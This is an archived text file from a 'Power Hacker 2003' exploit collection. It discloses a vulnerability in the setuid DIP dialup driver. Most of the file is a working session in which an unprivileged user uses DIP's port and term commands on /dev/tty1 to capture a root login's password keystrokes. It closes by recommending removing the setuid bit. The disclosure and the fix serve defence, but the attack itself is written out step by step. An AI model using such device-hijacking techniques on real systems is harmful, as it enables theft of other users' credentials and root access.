home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Power Hacker 2003
/
Power_Hacker_2003.iso
/
Exploit and vulnerability
/
hoobie
/
dip-prob.txt
< prev
next >
Wrap
Text File
|
2001-11-06
|
1KB
|
29 lines
I seem to have stumbled across another vulnerability in DIP. It
appears to allow any user to gain control of arbitrary devices in /dev.
For instance, I have successfully stolen keystrokes from a root login as
follows... (I could also dump characters to the root console)
$ whoami
cesaro
$ cat < /dev/tty1 <------ root login here
bash: /dev/tty1: Permission denied <------ nope, we can see it
$ dip -t
DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96)
Written by Fred N. van Kempen, MicroWalt Corporation.
DIP> port tty1
DIP> echo on
DIP> term
[ Entering TERMINAL mode. Use CTRL-] to get back ]
roots_password <------ OH, maybe we *CAN* see it!
[ Back to LOCAL mode. ]
DIP> quit
$
I'm sure there are many more creative things to do with this, but this is
the first thing that came to mind when I discovered it, and is a good
example of what can be done. Not all devices are accessible. I have not
looked into the patch at this time, but I recommend chmod u-s dip, as
usual! :)